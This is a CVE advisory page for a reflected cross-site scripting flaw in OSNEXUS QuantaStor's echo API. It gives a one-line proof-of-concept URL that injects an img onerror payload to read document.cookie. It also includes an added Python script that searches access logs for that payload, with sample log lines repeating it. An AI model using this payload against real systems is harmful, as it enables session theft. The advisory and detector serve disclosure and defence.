CVE-2021-42080
Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355
| CVE | CVE-2021-42080 |
| Title | Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355 |
| Credits | |
| Affected products | |
| CVSS | Base score: 7.4 (HIGH) |
| References | |
| Problem type(s) | CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
| Date published | |
| Last modified | 11 Mar 2025 13:39 UTC |
Description
			
An attacker is able to launch a Reflected XSS attack using a crafted URL.

POC:
Visit the following URL:
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
Solution(s)
				
					Upgrade to the latest version of OSNEXUS QuantaStor.
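
For systems that cannot be upgraded immediately, requests matching the PoC pattern can be looked for in HTTP access logs. The following is an added example, not part of the original advisory or of OSNEXUS code; it assumes requests to the API are recorded in common/combined access-log format (for instance by a reverse proxy), and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter named in the advisory's PoC URL.
ECHO_PATH = "/qstorapi/echo"
PARAM = "inputMessage"
# Request line inside an access-log entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets are what a reflected tag such as the PoC's <img> needs.
MARKUP_RE = re.compile(r"[<>]")

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_echo_requests(log_lines):
    """Return (line_number, decoded_value) for echo requests whose inputMessage carries markup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path.rstrip("/") != ECHO_PATH:
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((n, value))
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /qstorapi/echo?inputMessage=hello HTTP/1.1" 200 5',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /qstorapi/echo?inputMessage=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E HTTP/1.1" 200 48',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /qstorapi/echo?inputMessage=%253Cb%253Ehi HTTP/1.1" 200 9',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /qstorapi/other?inputMessage=%3Cb%3E HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line_no, value in suspicious_echo_requests(SAMPLE_LOG):
        print(f"line {line_no}: {value}")
```

A hit shows that a crafted link was requested, not that script ran in a victim's browser; correlate with the referrer and the session that issued the request.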
				
			
		
	